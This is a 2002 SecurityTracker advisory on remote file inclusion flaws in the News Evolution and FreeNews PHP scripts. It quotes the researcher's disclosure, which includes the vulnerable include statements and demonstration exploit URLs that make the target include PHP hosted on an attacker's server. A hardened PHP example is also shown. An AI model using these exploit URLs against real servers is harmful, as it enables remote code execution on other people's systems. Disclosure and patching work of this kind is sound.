News Evolution Forum Software Include File Bug Lets Remote Users Execute Arbitrary Commands on the System
|
|
SecurityTracker Alert ID: 1005718 |
|
CVE Reference: GENERIC-MAP-NOMATCH
|
Date: Nov 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Version(s): 1.0, 2.0
|
Description: An include file vulnerability was reported in News Evolution. A remote user can execute arbitrary commands on the server.
It is reported that several modules contain include statements that allow a remote user to specify a remote location for the include file. The statements in News Evolution 1.0 are reported to be in the aff_news.php, moteur/moteur.php, and export_news.php scripts. The statements in News Evolution 2.0 are reported to be in backend.php, screen.php, and admin/modules/comment.php.
A remote user can create arbitrary PHP code and host it on a remote server. Then, the remote user can issue a specially crafted URL to the target server that specifies the remote PHP code for inclusion.
A demonstration exploit URL for News Evolution 1.0 is provided:
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
A demonstration exploit URL for News Evolution 2.0 is provided:
http://[target]/screen.php?neurl=http://[attacker]
with:
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
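A hardened form of the include pattern described above, as an added example that is not News Evolution or vendor code; `NE_BASE`, `ne_path()`, `ne_lang_file()` and the language file paths are hypothetical. It assumes a current PHP release and fixes the base directory server-side instead of reading it from a variable the request can set.

```php
<?php
// Added illustration, not News Evolution code. NE_BASE, ne_path() and the
// language allowlist are hypothetical names and values.
//
// Vulnerable form quoted in the advisory (the script never assigns $chemin,
// so a request parameter can supply it, e.g. under register_globals):
//     include ("$chemin/config.php");

// Base directory comes from the script's own location, never from input.
define('NE_BASE', realpath(__DIR__));

// Resolve $relative under NE_BASE; return the absolute path or false.
function ne_path($relative)
{
    // No stream wrappers (http://, ftp://, php://, ...) and no NUL bytes.
    if (strpos($relative, '://') !== false || strpos($relative, "\0") !== false) {
        return false;
    }
    // realpath() collapses "../" and symlinks; false if the file is missing.
    $path = realpath(NE_BASE . DIRECTORY_SEPARATOR . $relative);
    $prefix = rtrim(NE_BASE, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // Containment: the resolved file must still sit below NE_BASE.
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $path;
}

// A selector such as $sitelang is mapped through an allowlist, not
// interpolated into the path.
function ne_lang_file($sitelang)
{
    $allowed = array('fr' => 'admin/lang/fr.php', 'en' => 'admin/lang/en.php');
    return isset($allowed[$sitelang]) ? $allowed[$sitelang] : false;
}

// Constructed inputs: the first mirrors the advisory's remote-URL value.
$samples = array('http://attacker.example/config.php', '../../etc/passwd',
                 basename(__FILE__));
foreach ($samples as $s) {
    printf("%-40s %s\n", $s, ne_path($s) === false ? 'rejected' : 'accepted');
}
var_dump(ne_lang_file('http://attacker.example'));

// In a patched script the includes run at file scope, so variables set by
// config.php stay visible to the rest of the page:
//     $f = ne_path('config.php') or exit('configuration error');
//     require_once $f;
```

On the server side, `allow_url_include` (off by default since it was introduced in PHP 5.2) blocks URL targets for include, and `register_globals` was removed in PHP 5.4.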
|
Impact: A remote user can execute arbitrary commands on the system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.phpevolution.net/index.php?to=newsevolution
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Frog Man" <leseulfrog@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 26 Nov 2002 17:43:49 +0100
From: "Frog Man" <leseulfrog@hotmail.com>
Subject: FreeNews & News Evolution (PHP)
|
Information :
°°°°°°°°°°°°°°
Problem : Include files
a) -------------------
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
----------------------
b) -------------------
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
----------------------
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
a) freenews 2.1
aff_news.php :
-------------------------------------------------
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-------------------------------------------------
...
b) News Evolution 1.0
aff_news.php :
-------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-------------------------------------
moteur/moteur.php :
--------------------------------------------------
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--------------------------------------------------
export_news.php :
---------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---------------------------------------
...
c) News Evolution 2.0
backend.php :
---------------------------------------------------------
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
---------------------------------------------------------
screen.php :
---------------------------------------------------------
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
---------------------------------------------------------
admin/modules/comment.php :
---------------------------------------------------------
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
---------------------------------------------------------
...
Exploits :
°°°°°°°°°°
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...
b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...
c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
...
Patch :
°°°°°°°
http://www.phpsecure.org
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/NEfree.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
|
|